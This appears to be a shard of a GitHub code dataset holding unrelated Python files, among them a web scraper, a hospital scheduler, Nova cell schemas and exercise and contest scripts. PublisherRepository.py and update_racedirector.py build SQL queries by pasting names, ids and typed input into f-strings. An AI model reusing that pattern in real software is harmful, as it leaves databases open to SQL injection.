shop.find_element_by_xpath(\"div[contains(@class,'col col-3 available')]\").text\n count_phone = re.findall('(\\d+)', count_phone_text)\n print(shop_name, shop_address, shop_latitude, shop_longitude,count_phone)\n btn_close = window.find_element_by_class_name(\"modal-close-btn\")\n btn_close.click()\n WebDriverWait(driver, 15).until(EC.invisibility_of_element_located((By.ID, window_div_text)))\n # WebDriverWait(driver, 15).until(EC.invisibility_of_element_located(window))\n #time.sleep(1)\n\n\n\ndef scrolling_object(object):\n webdriver.ActionChains(driver).move_to_element(object).perform();\n\ndef lookup_main_url(driver):\n select_category(driver)\n parsing()\n\n\n\ndef select_category(driver):\n driver.get(url_group)\n #\nif __name__ == 
\"__main__\":\n start_time=time.time()\n driver = init_driver()\n lookup_main_url(driver)\n\n print(time.time()-start_time)\n driver.quit()\n\n\n\n","repo_name":"danilshik/Parsers","sub_path":"dns.ru/dns.py","file_name":"dns.py","file_ext":"py","file_size_in_byte":6040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1401878522","text":"from src.Exceptions.PublisherExceptions import InsertException, DeleteException\nfrom src.util.Constants import Constants\nfrom src.repository import Connection\nfrom src.model.Publisher import Publisher\n\n\nclass PublisherRepository:\n\n def get_all(self):\n cursor = Connection.open()\n try:\n cursor.execute(f'SELECT * FROM {Constants.Publisher.TABLE}')\n publishers = []\n for x in cursor.fetchall():\n publisher = Publisher(\n x[Constants.Publisher.ID],\n x[Constants.Publisher.NAME],\n )\n publishers.append(publisher)\n return publishers\n finally:\n Connection.close()\n\n def insert(self, publisher):\n cursor = Connection.open()\n try:\n cursor.execute(f'''\n INSERT INTO {Constants.Publisher.TABLE}(\n {Constants.Publisher.NAME}\n ) VALUES (\"{publisher.name}\")''')\n except Exception as e:\n raise InsertException\n finally:\n cursor.close()\n Connection.close()\n\n def delete(self, id):\n cursor = Connection.open()\n try:\n cursor.execute(f'DELETE FROM {Constants.Publisher.TABLE} WHERE {Constants.Publisher.ID} = {id}')\n except Exception as e:\n raise DeleteException\n finally:\n cursor.close()\n Connection.close()\n","repo_name":"Rasipe/apocrypha-api","sub_path":"src/repository/PublisherRepository.py","file_name":"PublisherRepository.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14655928159","text":"import numpy as np\nimport datetime\nimport csv\n\n\n#=================== Object docotr ============================\n# dr_level: 0 - pgy1\n#\t\t\t1 - pgy2\n#\t\t\t2 - r1\n#\t\t\t3 - r2\n#\t\t\t4 - r3\n#\t\t\t5 - r4\n# \t\t\t6 - r5\n#\t\t\t7 - r6\n\n# =========== now don't use the dr-level ==> change to use remaining points =====\nclass Doctor :\n\tdef __init__(self, dr_id, point, special_rule):\n\t\tself.point = point\n\t\tself.id = dr_id\n\n#special rule is for doctors only allowed in some areas\t\t\n\t\tself.special_rule = special_rule\n\n\n#\tpoint = 5;\n\tdef get_point(self):\n\t\treturn self.point\n\n\tdef get_id(self):\n\t\treturn self.id\n\n\n\n#==============================================================\n\n\n#=================== Object WorkingDay ========================\nclass WorkingDay :\n\tdef __init__(self, date):\n\t\tif( date.weekday() > 4): #Monday is 0\n\t\t\tself.count = 2\n\t\telse:\n\t\t\tself.count = 1\n\t\tself.jobs = ['']*6#np.zeros(5) # The array is for jobs scheduling => needs to filled with dr's id\n\t\tself.wards = ['A','B','C','D','E','I']\n\t\tself.date = date\n\t\t\t\t\n\t\t\n#==============================================================\n\ndr_list = list()\nworkingDay_list = list()\n\ndef parseCSV(filename):\n\t# here to read the file and do the parsing\n\twith open(filename, newline='') as csvfile:\n\t\trows = list(csv.reader(csvfile))\n\t\tprint(rows[2])\n\t\t\n\n\t\t#drDict = dict(zip(rows[0], rows[1])\n\t\t_dr_list = zip(rows[0], rows[1], rows[2])\n\t\t#print(drDict)\n\t\t#for dr_id, remaining_pts in drDict.items():\n\t\tfor dr_id, remaining_pts, s_rule in _dr_list:\n\t\t\tward_arr = s_rule.split(',')\n\t\t\tprint(dr_id, remaining_pts, 
ward_arr)\n\t\t\tif dr_id != '':\n\t\t\t\tdr_list.append(Doctor(dr_id, int(remaining_pts), ward_arr))\n\t\t#print(dr_list)\n#\tdr_list.append(Doctor()) # Todo: fill the dr info\n#\td1 = datetime.date(2021, 9, 1);\n#\td2 = datetime.date(2021, 9, 30);\n#\tdelta = d2 - d1\n#\tfor i in range(delta.days + 1):\n#\t\td_tmp = d1 + datetime.timedelta(days=i)\n#\t\tworkingDay_tmp = WorkingDay(d_tmp)\n#\t\tprint(\"date: %s, weekday: %d, count %d, jobs %s\" % (d_tmp, d_tmp.weekday(), workingDay_tmp.count, workingDay_tmp.arr))\n\n# create the working day list\ndef createWDList(year, month):\n\tndays = (datetime.date(year, month+1, 1) - datetime.date(year, month, 1)).days\n\td1 = datetime.date(year, month, 1)\n\td2 = datetime.date(year, month, ndays)\n\tdelta = d2 - d1\n\n\tprint(\"year=%d, month=%d, ndays=%d\" %(year, month, ndays))\n\tfor i in range(ndays):\n\t\tworkingDay_list.append(WorkingDay(d1+datetime.timedelta(days=i)))\n\tfor item in workingDay_list:\n\t\tprint (\"item.date :%s, item.count:%d\" %(item.date, item.count))\n\t\n#print(workingDay_list)\n\ndef findDrWithHighestPoint(dr_list):\n\thighestPoint = 0\n\tid_of_the_dr = 0\n#\tcandidateDr\n\tfor dr in dr_list:\n\t\tif(dr.get_point() > 0 and dr.get_point() > highestPoint):\n#\t\t\tcandidateDr = dr\n\t\t\thighestPoint = dr.get_point()\n\t\t\tid_of_the_dr = dr.get_id()\n\treturn id_of_the_dr\n\ndef fitRule(dr, ward):\n\tfor ok_ward in dr.special_rule:\n\t\tif ok_ward == ward:\n\t\t\treturn ward\n\n\treturn None\ndef findDrWithHighestPoint_fitRule(dr_list, ward):\n\thighestPoint = 0\n\tid_of_the_dr = 0\n#\tcandidateDr\n\tfor dr in dr_list:\n\t\tok_ward = fitRule(dr, ward)\n\t\tif(dr.get_point()> 0 and dr.get_point() > highestPoint and ok_ward): # TODO: arrange guys with higher points\n#\t\tif(ok_ward):\t\t\t\n#\t\t\tcandidateDr = dr\n\t\t\thighestPoint = dr.get_point()\n\t\t\tid_of_the_dr = dr.get_id()\n\treturn id_of_the_dr\n\ndef getDrFromList(dr_id):\n\tfor dr in dr_list:\n\t\tif(dr.get_id() == dr_id):\n\t\t\treturn dr\n\t\t\n\ndef fillWorkingDay(workingDay):\n\tfor i in range(len(workingDay.jobs)):\n#\tfor job in workingDay.jobs:\n#\t\t_id = findDrWithHighestPoint(dr_list)\n\t\t_id = findDrWithHighestPoint_fitRule(dr_list, workingDay.wards[i])\n\t\tprint(\"id=%s, ward=%s\" %(_id, workingDay.wards[i]) )\n\t\tif(_id != 0):\n\t\t\tgetDrFromList(_id).point -= workingDay.count\n\t\t\tworkingDay.jobs[i] = _id\n\t\t\tprint(_id)\n\tfor i in range(len(workingDay.jobs)):\n\t\tif(workingDay.jobs[i] == ''):\n\t\t\t_id = findDrWithHighestPoint(dr_list)\n\t\t\tgetDrFromList(_id).point -= workingDay.count\n\t\t\tworkingDay.jobs[i] = _id\n\ndef schedule(dr_list, wd_list):\n\tfor wd in wd_list:\n\t\tprint(wd.date, wd.count)\n\t\tfillWorkingDay(wd)\n\t\tprint(wd.jobs)\n\t\n\t\t\t\ndef showDrList():\n\tfor dr in dr_list:\n\t\tprint(dr.get_id(), dr.get_point())\n\ndef createCSVoutput(filePos):\n\twith open(filePos, 'w', newline='', encoding='UTF8') as csvfile:\n\t\twriter = csv.writer(csvfile)\n\n\t\t#first row\n\t\tid_row = ['Doctor_ID']\n\t\tfor dr in dr_list:\n\t\t\tid_row.append(dr.get_id())\n\t\twriter.writerow(id_row)\n\n\t\t#date\n\t\tfor wd in workingDay_list:\n\t\t\tdate_row = [wd.date]\n\t\t\tfor dr in dr_list:\n\t\t\t\t_id = dr.get_id()\n\t\t\t\tif _id == wd.jobs[0]:\n\t\t\t\t\tdate_row.append(wd.wards[0])\n\t\t\t\telif _id == wd.jobs[1]:\n\t\t\t\t\tdate_row.append(wd.wards[1])\n\t\t\t\telif _id == wd.jobs[2]:\n\t\t\t\t\tdate_row.append(wd.wards[2])\n\t\t\t\telif _id == wd.jobs[3]:\n\t\t\t\t\tdate_row.append(wd.wards[3])\n\t\t\t\telif _id == 
wd.jobs[4]:\n\t\t\t\t\tdate_row.append(wd.wards[4])\n\t\t\t\telif _id == wd.jobs[5]:\n\t\t\t\t\tdate_row.append(wd.wards[5])\t\n\t\t\t\telse:\n\t\t\t\t\tdate_row.append('')\n\t\t\twriter.writerow(date_row)\n\t\t\n\t\tremainingPoint_row = ['point left']\n\t\tfor dr in dr_list:\n\t\t\tremainingPoint_row.append(dr.get_point())\n\t\twriter.writerow(remainingPoint_row)\n\t\n\t\n\t\t\n\ndef main():\n#\tdr = Doctor(3);\n#\ttd = WorkingDay(datetime.date.today())\n#\twend = WorkingDay(datetime.datetime(2021,9,19))\n#\tprint (dr.get_point());\n#\tprint (datetime.date.today().weekday())\n#\tprint (datetime.datetime(2021,9,20).weekday())\n#\tprint (\"today has %d count\" % td.count)\n#\tprint (\"2021.9.19 has %d count\" % wend.count)\n\tparseCSV(\"data/dr-data-nov.csv\")\n\tcreateWDList(2021,11)\n\tfor doctor in dr_list:\n\t\tprint(doctor.get_id(), doctor.get_point())\n\tschedule(dr_list, workingDay_list)\n\tshowDrList()\n\tcreateCSVoutput(\"output/nov-output.csv\")\n\n# main function starts here\nmain()\n\n\n","repo_name":"howard-hsien/hospital-scheduling-system","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37798606041","text":"from calendar import c\nimport connectserver\nimport upload_racedirector\n\ndef update_racedirector():\n db = connectserver.connectserver(\"server.json\", \"league\")\n cursor = db.cursor()\n\n # first search and delete the original result\n while True:\n try:\n race = input(\"请输入比赛站名(同时支持中英文), 输入q回到主菜单:\")\n if race == \"q\" or race == \"Q\":\n break\n group = input(\"请选择组别, 输入q回到主菜单:\")\n if group == 'q' or group == 'Q':\n break\n\n query = f'SELECT CaseNumber, CaseDate, raceDirector.driverGroup, GP, raceCalendar.GP_CHN \\\n FROM raceDirector JOIN raceCalendar \\\n ON raceDirector.GP = raceCalendar.GP_ENG \\\n AND raceDirector.driverGroup = raceCalendar.driverGroup \\\n WHERE driverName != \"Race Director\" AND \\\n raceDirector.driverGroup = \"{group}\" AND \\\n (raceCalendar.GP_CHN = \"{race}\" OR raceCalendar.GP_ENG = \"{race}\");'\n cursor.execute(query)\n result = cursor.fetchall()\n if len(result) == 0:\n raise AttributeError(\"没有当场比赛的判罚记录,请重新输入正确的选项\\n\")\n \n racedesc = f'{group} {result[0][4]} {result[0][3]}'\n test = input(f'你选择了 “{racedesc}”,一共找到{len(result)}条判罚记录\\n按Enter以继续,输入q回到上一级\\n')\n if test == 'q' or test == 'Q':\n raise ValueError()\n \n query = f'DELETE FROM raceDirector WHERE driverName != \"Race Director\" \\\n AND driverGroup = \"{group}\" AND GP = \"{result[0][3]}\";'\n cursor.execute(query)\n db.commit()\n\n test = input(\"原比赛判罚记录已清除,按Enter重新上传排位赛数据,输入q回到主菜单\\n\")\n if test == 'q' or test == 'Q':\n break\n\n upload_racedirector.upload_racedirector()\n break\n\n except Exception as e:\n print(str(e))\n","repo_name":"STevenL1i/AFR-AutoRankingProject","sub_path":"Archive/v6.01.1(发展联盟)/src/update_racedirector.py","file_name":"update_racedirector.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9004291901","text":"tests = int(input())\n\nwhile tests > 0:\n min_ans = 6\n max_ans = 1\n tests = tests - 1\n size = int(input())\n speed = [int(x) for x in input().split()]\n\n meetings = []\n for i in range(0, size - 1):\n for j in range(i + 1, size):\n if (speed[i] != speed[j]):\n t = float(i - j) / float(speed[j] - speed[i])\n if t >= 0:\n meetings.append((t, i, j))\n\n meetings.sort(key = lambda x: 
x[0])\n\n for inf in range(0, size):\n pos = [x for x in range(1, size + 1)]\n infected = [False for x in range(0, size)]\n infected[inf] = True\n\n for meeting in meetings:\n infected[meeting[1]] = (infected[meeting[1]] or infected[meeting[2]])\n infected[meeting[2]] = infected[meeting[1]]\n\n count = 0\n for m in range(0, size):\n if infected[m]:\n count = count + 1\n\n if count < min_ans:\n min_ans = count\n\n if count > max_ans:\n max_ans = count\n\n print(str(min_ans) + ' ' + str(max_ans))\n","repo_name":"adit-t/competitive-programming","sub_path":"codechef/long-challenges/2020/sept/covid19b.py","file_name":"covid19b.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28560118527","text":"import copy\n\nfrom nova.api.validation import parameter_types\n\n\ncreate = {\n 'type': 'object',\n 'properties': {\n 'cell': {\n 'type': 'object',\n 'properties': {\n 'name': parameter_types.cell_name,\n 'type': {\n 'type': 'string',\n 'enum': ['parent', 'child'],\n },\n\n # NOTE: In unparse_transport_url(), a url consists of the\n # following parameters:\n # \"qpid://:@:/\"\n # or\n # \"rabiit://:@:/\"\n # Then the url is stored into transport_url of cells table\n # which is defined with String(255).\n 'username': {\n 'type': 'string', 'maxLength': 255,\n 'pattern': '^[a-zA-Z0-9-_]*$'\n },\n 'password': {\n # Allow to specify any string for strong password.\n 'type': 'string', 'maxLength': 255,\n },\n 'rpc_host': parameter_types.hostname_or_ip_address,\n 'rpc_port': parameter_types.tcp_udp_port,\n 'rpc_virtual_host': parameter_types.hostname_or_ip_address,\n },\n 'required': ['name'],\n 'additionalProperties': False,\n },\n },\n 'required': ['cell'],\n 'additionalProperties': False,\n}\n\n\ncreate_v20 = copy.deepcopy(create)\ncreate_v20['properties']['cell']['properties']['name'] = (parameter_types.\n cell_name_leading_trailing_spaces)\n\n\nupdate = {\n 'type': 'object',\n 'properties': {\n 'cell': {\n 'type': 'object',\n 'properties': {\n 'name': parameter_types.cell_name,\n 'type': {\n 'type': 'string',\n 'enum': ['parent', 'child'],\n },\n 'username': {\n 'type': 'string', 'maxLength': 255,\n 'pattern': '^[a-zA-Z0-9-_]*$'\n },\n 'password': {\n 'type': 'string', 'maxLength': 255,\n },\n 'rpc_host': parameter_types.hostname_or_ip_address,\n 'rpc_port': parameter_types.tcp_udp_port,\n 'rpc_virtual_host': parameter_types.hostname_or_ip_address,\n },\n 'additionalProperties': False,\n },\n },\n 'required': ['cell'],\n 'additionalProperties': False,\n}\n\n\nupdate_v20 = copy.deepcopy(create)\nupdate_v20['properties']['cell']['properties']['name'] = (parameter_types.\n cell_name_leading_trailing_spaces)\n\n\nsync_instances = {\n 'type': 'object',\n 'properties': {\n 'project_id': parameter_types.project_id,\n 'deleted': parameter_types.boolean,\n 'updated_since': {\n 'type': 'string',\n 'format': 'date-time',\n },\n },\n 'additionalProperties': False,\n}\n","repo_name":"BU-NU-CLOUD-SP16/Trusted-Platform-Module-nova","sub_path":"nova/api/openstack/compute/schemas/cells.py","file_name":"cells.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"21861580134","text":"import shutil\nfrom instrumentdatabaseapi import instrumentdatabaseapi as API\nfrom SimExLite.WavefrontData import WPGFormat\nimport wpg\nfrom wpg import wpg_uti_wf, srwlib\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as 
colors\n\n\nrepo = API.Repository(local_repo=\".\")\n\n# import the units\nimport pint\n\nureg = pint.get_application_registry()\n\ninstrument_name = \"SPB-SFX\"\nflavour = \"\"\n# flavour = \"AGIPD_detector\"\n# flavour = \"JUNGFRAU_detector\"\n\nbase_dir = f\"./SPB_SFX_instrument_{flavour}\"\n\nrepo.ls_flavours(\"EuXFEL\", instrument_name, \"HEAD\", \"simex-lite\")\n\n# SPB_SFX = repo.load(\"EuXFEL\", instrument_name, \"HEAD\", \"simex-lite\")\nSPB_SFX = repo.load(\"EuXFEL\", instrument_name, \"HEAD\", \"simex-lite\", flavour)\n\n\nprint(SPB_SFX.master)\n\n# shutil.rmtree(\"./SPB_SFX_instrument\", ignore_errors=True)\nshutil.rmtree(base_dir, ignore_errors=True)\n\n# SPB_SFX.set_instrument_base_dir(\"./SPB_SFX_instrument\")\nSPB_SFX.set_instrument_base_dir(base_dir)\n\nSPB_SFX.set_sample_by_file(\n \"institutes/EuXFEL/instruments/SPB-SFX/HEAD/simex-lite/2nip.pdb\"\n)\nSPB_SFX.master[\"photon_energy\"] = 6000\n# SPB_SFX.master[\"energy\"] = 20000\n\nprint(SPB_SFX.master)\nprint(SPB_SFX)\n\nSPB_SFX.run()\n\n# Visualization\nmwf = wpg.Wavefront()\nsource_WPG = (\n SPB_SFX.calculators[\"gaussian_source\"]\n .output.to_list()[0]\n .write(\"source.h5\", WPGFormat)\n)\nmwf.load_hdf5(source_WPG.filename)\nwpg_uti_wf.plot_intensity_map(mwf)\nwpg_uti_wf.integral_intensity(mwf)\nsrwlib.srwl.SetRepresElecField(mwf._srwl_wf, \"f\")\nwpg_uti_wf.integral_intensity(mwf)\n\nmwf = wpg.Wavefront()\nprop_WPG = SPB_SFX.calculators[\"WPGCalculator\"].output.to_list()[0]\nmwf.load_hdf5(prop_WPG.filename)\nwpg_uti_wf.plot_intensity_map(mwf)\nwpg_uti_wf.integral_intensity(mwf)\nsrwlib.srwl.SetRepresElecField(mwf._srwl_wf, \"f\")\nwpg_uti_wf.integral_intensity(mwf)\n\ndiffr = SPB_SFX.calculators[\"Diffr_calculator\"].output.to_list()[0]\ndiffr_data = diffr.get_data()\nfig, ax = plt.subplots(2, 5, figsize=(18, 8))\nfor i in range(2):\n for j in range(5):\n ax[i, j].imshow(diffr_data[\"img_array\"][j + i * 5], norm=colors.LogNorm())\n ax[i, j].get_xaxis().set_visible(False)\n ax[i, j].get_yaxis().set_visible(False)\n\nplt.tight_layout()\nplt.show()\n","repo_name":"PaNOSC-ViNYL/instrument_database","sub_path":"mysim_simex-lite.py","file_name":"mysim_simex-lite.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17270626927","text":"#Script_json_maker0.3\nimport json\n\ncodecov=\"-\"\nBranchcov=\"-\"\nvulndetected=\"-\"\ntimetaken=\"-\"\ntimetrigger=\"-\"\nTransactions = \"-\"\nFile_path= \"coverage_json.json\"\n\ndef coverage_json_maker():\n Dict={}\n Dict=dict({\"Code_Coverage\":codecov,\"Branch_Coverage\":Branchcov,\"No._of_Transactions\":Transactions, \"Time_Taken\": timetaken,\"Time_trigger\": timetrigger})\n with open(File_path, 'a', encoding=\"utf-8\") as file:\n x = json.dumps(Dict, indent=4)\n file.write(x + '\\n')","repo_name":"sunbeam891/Smart_contract_fuzzing","sub_path":"scripts/coverage_json.py","file_name":"coverage_json.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8570879097","text":"import scullery.workers\nscullery.workers.start()\n\nimport scullery.iceflow\nimport scullery.fluidsynth\n\nimport os,time\n\nimport unittest,random,gc\n\nclass Player(scullery.iceflow.GstreamerPipeline):\n def __init__(self,file):\n scullery.iceflow.GstreamerPipeline.__init__(self,realtime=False)\n\n self.src = self.addElement('filesrc',location=file)\n\n #This bin autodetects and decodes basically any type of 
media\n #It is special cased, anything onnected to it is actually connected on-demand as needed\n decodebin = self.addElement('decodebin')\n\n\n self.addElement('audioconvert',connectToOutput=decodebin)\n self.addElement('audioresample')\n\n self.fader = self.addElement('volume', volume=1)\n self.sink = self.addElement('autoaudiosink') \n\n\nclass TestAudio(unittest.TestCase):\n\n def test_z_no_segfaults(self):\n #Test for segfault-ery\n for i in range(0,100):\n p=Player(os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), \"media\",\"Brothers Unite.ogg\"))\n p.start()\n time.sleep(0.01*random.random())\n p.seek(0.3)\n time.sleep(0.01*random.random())\n p.setProperty(p.fader, \"volume\",0.1)\n p.stop()\n #Ensure nothing bad happens setting the volume after stopping\n p.setProperty(p.fader, \"volume\",1)\n del p\n gc.collect()\n for i in range(150):\n time.sleep(0.1)\n if len(scullery.iceflow.pipes)==0:\n break\n gc.collect()\n\n self.assertEqual(len(scullery.iceflow.pipes), 0)\n \n def test_seekpastend(self):\n p=Player(os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), \"media\",\"Brothers Unite.ogg\"))\n p.start()\n time.sleep(0.01*random.random())\n p.seek(99999)\n time.sleep(0.01*random.random())\n p.setProperty(p.fader, \"volume\",1)\n p.stop()\n #Ensure nothing bad happens setting the volume after stopping\n p.setProperty(p.fader, \"volume\",1)\n del p\n gc.collect()\n for i in range(150):\n time.sleep(0.1)\n if len(scullery.iceflow.pipes)==0:\n break\n gc.collect()\n\n self.assertEqual(len(scullery.iceflow.pipes), 0)","repo_name":"EternityForest/scullery","sub_path":"tests/testGstStability.py","file_name":"testGstStability.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"13155109847","text":"import random\r\nimport pandas as pd\r\n\r\n# Read exercise data from Excel file\r\nexercise_data = pd.read_excel('Book1.xlsx')\r\n\r\n# Create dictionaries and lists to store exercises for each level\r\nexercise_lists = {}\r\ncompleted_exercises1_3 = []\r\ncompleted_exercises3_4 = []\r\ncompleted_exercises4_5 = []\r\nrecommended_exercises1_3b = []\r\nrecommended_exercises3_4b=[]\r\nrecommended_exercises4_5b=[]\r\nrecommended_exercises1_3i = []\r\nrecommended_exercises3_4i=[]\r\nrecommended_exercises4_5i=[]\r\nrecommended_exercises1_3a = []\r\nrecommended_exercises3_4a=[]\r\nrecommended_exercises4_5a=[]\r\n\r\n# Loop through the exercise data and append exercises to the appropriate exercise list\r\nfor index, row in exercise_data.iterrows():\r\n level = row['Level']\r\n exercise = row['Exercise']\r\n if level not in exercise_lists:\r\n exercise_lists[level] = []\r\n exercise_lists[level].append(exercise)\r\n\r\n# Shuffle the exercise lists for each level\r\n#for level in exercise_lists:\r\n #random.shuffle(exercise_lists[level])\r\n\r\n# Create separate lists for each level\r\nlevel_1_exercises = exercise_lists.get(1, [])\r\nlevel_2_exercises = exercise_lists.get(2, [])\r\nlevel_3_exercises = exercise_lists.get(3, [])\r\nlevel_4_exercises = exercise_lists.get(4, [])\r\nlevel_5_exercises = exercise_lists.get(5, [])\r\n\r\nlevel1_3_exercises = level_1_exercises + level_3_exercises\r\nlevel3_4_exercises = level_3_exercises + level_4_exercises\r\nlevel4_5_exercises = level_4_exercises + level_5_exercises\r\n\r\n\r\n# Loops to recommend exercises\r\nfor i in range(1,76):\r\n if (i % 5 == 0 and i !=1) :\r\n 
recommended_exercises1_3b.append(random.choice(level_2_exercises))\r\n else:\r\n recommended_exercises1_3b.append(random.choice(level1_3_exercises))\r\n\r\nfor i in range(1,151):\r\n if (i % 5 == 0 and i !=1) :\r\n recommended_exercises3_4b.append(random.choice(level_2_exercises))\r\n else:\r\n recommended_exercises3_4b.append(random.choice(level3_4_exercises))\r\n\r\nfor i in range(1,226):\r\n if (i % 5 == 0 and i !=1) :\r\n recommended_exercises4_5b.append(random.choice(level_2_exercises))\r\n else:\r\n recommended_exercises4_5b.append(random.choice(level4_5_exercises))\r\n\r\n#loops for Intermediate type\r\nfor i in range(1,121):\r\n if (i % 5 == 0 and i !=1) :\r\n recommended_exercises1_3i.append(random.choice(level_2_exercises))\r\n else:\r\n recommended_exercises1_3i.append(random.choice(level1_3_exercises))\r\n\r\nfor i in range(1,241):\r\n if (i % 5 == 0 and i !=1) :\r\n recommended_exercises3_4i.append(random.choice(level_2_exercises))\r\n else:\r\n recommended_exercises3_4i.append(random.choice(level3_4_exercises))\r\n\r\nfor i in range(1,361):\r\n if (i % 5 == 0 and i !=1) :\r\n recommended_exercises4_5i.append(random.choice(level_2_exercises))\r\n else:\r\n recommended_exercises4_5i.append(random.choice(level4_5_exercises))\r\n#loops for Intermediate type\r\nfor i in range(1,151):\r\n if (i % 5 == 0 and i !=1) :\r\n recommended_exercises1_3a.append(random.choice(level_2_exercises))\r\n else:\r\n recommended_exercises1_3a.append(random.choice(level1_3_exercises))\r\nfor i in range(1,301):\r\n if (i % 5 == 0 and i !=1) :\r\n recommended_exercises3_4a.append(random.choice(level_2_exercises))\r\n else:\r\n recommended_exercises3_4a.append(random.choice(level3_4_exercises))\r\n\r\nfor i in range(1,451):\r\n if (i % 5 == 0 and i !=1) :\r\n recommended_exercises4_5a.append(random.choice(level_2_exercises))\r\n else:\r\n recommended_exercises4_5a.append(random.choice(level4_5_exercises))\r\n\r\n\r\ndef questionaire(exercise,list_name,completed_exercise_group):\r\n answer = input(\"Could you do the exercise? (Provide yes or no) \")\r\n if answer == \"yes\" or answer == \"Yes\" or answer == \"yeah\" or answer == \"Yeah\":\r\n print(\"That's great\")\r\n completed_exercise_group.append(exercise) # Append exercise to completed exercises list\r\n elif answer == \"no\" or answer == \"No\" or answer == \"Nope\" or answer == \"nope\":\r\n print(\"No Problem.Please answer carefully:\")\r\n ans2=input(\"Why weren't you able to do the exercise? e.g. it's painful/it's too heavy: \")\r\n second_popup(list_name,completed_exercise_group)\r\n\r\n\r\n\r\ndef second_popup(list_name,completed_exercise_group):\r\n if len(completed_exercise_group)!=0:\r\n latest_exercise = completed_exercise_group[-1]\r\n for key, value in exercise_lists.items():\r\n if latest_exercise in value:\r\n level=key\r\n # print(f\"Latest element corresponds to key: {level}\")\r\n # Exit the loop after finding the corresponding key\r\n # Select an exercise from value list that is not in completed_exercises1_3 list\r\n \r\n selected_exercise = None\r\n for exercise in value:\r\n if exercise not in completed_exercise_group:\r\n selected_exercise = exercise\r\n print(f\"If you weren't able to do the previous exercise. 
Here's another recommendation for you: {selected_exercise }\")\r\n questionaire(selected_exercise,list_name,completed_exercise_group)\r\n break\r\n #break # Exit the loop after finding the selected exercise\r\n else:\r\n if level in exercise_lists:\r\n exercise_list = exercise_lists[level]\r\n # Select a random exercise from the same level\r\n random_exercise = random.choice(exercise_list)\r\n print(f\"You can repeat this exercise: {random_exercise}\")\r\n questionaire(random_exercise,list_name,completed_exercise_group)\r\n break # Exit the loop if no available exercises are found\r\n\r\n else:\r\n \r\n string = list_name\r\n prefix = \"completed_exercises\"\r\n level = string[len(prefix)] # level is the digit immediately following the prefix\r\n print(f\"string:{string}\")\r\n print(f\"level:{level}\") \r\n if int(level) in exercise_lists:\r\n exercise_list = exercise_lists[int(level)]\r\n #Select a random exercise from the same level\r\n random_exercise = random.choice(exercise_list)\r\n print(f\"You can try this one: {random_exercise}\")\r\n questionaire(random_exercise,list_name,completed_exercise_group)\r\n\r\n\r\ndef recommender(criterion,programs,list_name,recommended_exercise_group,completed_exercise_group):\r\n count=0\r\n for i, exercise in enumerate(recommended_exercise_group, 1):\r\n \r\n if i % criterion ==1 and count #\n# Creation Date : August 29, 2019 #\n# #\n#######################################################################################\n\nimport os\n\nif __name__ == \"__main__\":\n\n try:\n file_path = input(\"Enter path to file: \")\n print(f\"\\nThe size of {file_path} is: {os.path.getsize(file_path)} bytes\")\n\n except FileNotFoundError as fileNotFound:\n print(f\"Path is not valid file.\\n{fileNotFound}\")\n","repo_name":"ivenpoker/Python-Projects","sub_path":"Projects/Online Workouts/w3resource/Basic - Part-I/program-87.py","file_name":"program-87.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25434701607","text":"import sys\n\nn = int(sys.stdin.readline())\na = [int(i) for i in input().split()]\nlm = min(a)\nres = sys.maxsize\nfor i in range(1, lm+1):\n fl = 0\n sum = 0\n for j in range(n):\n if a[j]//i == a[j]//(i+1):\n fl = 1\n break\n if fl == 0:\n for j in range(n):\n sum += (a[j]//(i+1) + 1)\n res = min(sum, res)\nprint(res)\n \n","repo_name":"ducanhnguyen07/Python","sub_path":"day_so_tuong_thich.py","file_name":"day_so_tuong_thich.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"22203675500","text":"#!/bin/python3\n\n\"\"\"\nPearson correlation coefficient\n\nInput:\n2 7\n0.18 0.89 109.85\n1.0 0.26 155.72\n0.92 0.11 137.66\n0.07 0.37 76.17\n0.85 0.16 139.75\n0.99 0.41 162.6\n0.87 0.47 151.77\n4\n0.49 0.18\n0.57 0.83\n0.56 0.64\n0.76 0.18\n\nOutput:\n105.22\n142.68\n132.94\n129.71\n\n\"\"\"\nfrom sklearn import linear_model\n\nif __name__ == '__main__':\n m, n = list(map(int, input().split()))\n \n x = []\n y = []\n \n for _ in range(n):\n x_y = list(map(float, input().rstrip().split()))\n x.append(x_y[:m])\n y.append(x_y[m])\n \n #print(x)\n #print(y)\n lm = linear_model.LinearRegression()\n lm.fit(x, y)\n a = lm.intercept_\n b = lm.coef_\n #print(a, b[0], b[1])\n \n q = int(input()) \n fs_x = []\n for _ in range(q):\n fs_x = list(map(float, input().rstrip().split()))\n fs_y = a + sum([b[i]*fs_x[i] for i in range(m)])\n 
